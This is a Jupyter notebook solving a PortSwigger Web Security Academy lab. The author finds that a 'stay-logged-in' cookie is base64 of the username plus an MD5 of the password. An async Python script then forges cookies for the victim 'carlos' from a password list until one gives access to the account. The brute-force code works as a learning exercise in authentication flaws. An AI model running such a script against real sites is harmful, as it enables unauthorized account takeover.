[See here for lab](https://portswigger.net/web-security/authentication/other-mechanisms/lab-brute-forcing-a-stay-logged-in-cookie)

Your credentials: `wiener:peter`\
Victim's username: `carlos`

In [1]:
import asyncio
import aiohttp

#Important for jupyter
import nest_asyncio
nest_asyncio.apply()

#Other
import requests
import base64
import tqdm.notebook as tq

from load_un_pw import get_un_pw #usernames, passwords = get_un_pw()

In [2]:
URL = "https://acb51f3b1e0edf5bc02fedde00c300aa.web-security-academy.net/"

#Lets start by looking at the cookies we get if we log in...
my_data = {"username" : "wiener", "password" : "peter"}

s = requests.session()
r = s.post(URL + "login", data = my_data | {"stay-logged-in" : "on"})

if r.status_code == 504:
    print("session timed out")
    
sli_cookie = s.cookies.get_dict()["stay-logged-in"]
sli_cookie

'd2llbmVyOjUxZGMzMGRkYzQ3M2Q0M2E2MDExZTllYmJhNmNhNzcw'

In [3]:
base64.b64decode(sli_cookie)

b'wiener:51dc30ddc473d43a6011e9ebba6ca770'

Ok cool so it looks like our 'stay logged in' cookie is a base64 encoding of our password and the string `51dc30dd...`. Let's reset the session and see how it changes.

In [4]:
my_data = {"username" : "wiener", "password" : "peter"}
s = requests.session()
r = s.post(URL + "login", data = my_data | {"stay-logged-in" : "on"})
base64.b64decode(s.cookies.get_dict()["stay-logged-in"])

b'wiener:51dc30ddc473d43a6011e9ebba6ca770'

It's the same again. So the next thing I tried was to put my uername and password into a hashing function, which I did [here](https://dencode.com/en/hash).\
It turns out the second string is just the password put through MD5.\
Now I think we have enough information to try and brute force this.

In [5]:
#Verify that our MD5 hashing process works

import hashlib
hashlib.md5("peter".encode("utf-8")).hexdigest()

'51dc30ddc473d43a6011e9ebba6ca770'

In [6]:
#Grab a list of passwords
usernames, passwords = get_un_pw()

async def fetch(session, each_pw):
    hashed_pw = hashlib.md5(each_pw.encode("utf-8")).hexdigest()
    #Convert to base64 string (involves some encoding and decoding :S)
    sli_key = base64.b64encode(("carlos:" + hashed_pw).encode()).decode()
    #run get
    async with session.get(URL + "my-account", cookies = {"stay-logged-in" : sli_key}) as resp:
        text = await resp.text()
        return [each_pw, "Your username is:" in text]

async def main():
    async with aiohttp.ClientSession() as session:
        #loop through all passwords
        tasks = []
        for each_pw in passwords:
            tasks.append(fetch(session, each_pw))
                   
        return [await f for f in tq.tqdm(asyncio.as_completed(tasks), total=len(tasks))]
            
result = asyncio.run(main())
[x for x in result if x[1] == True]

  0%|          | 0/100 [00:00<?, ?it/s]

[['zxcvbn', True]]

Success!

Also, this code runs pretty fast.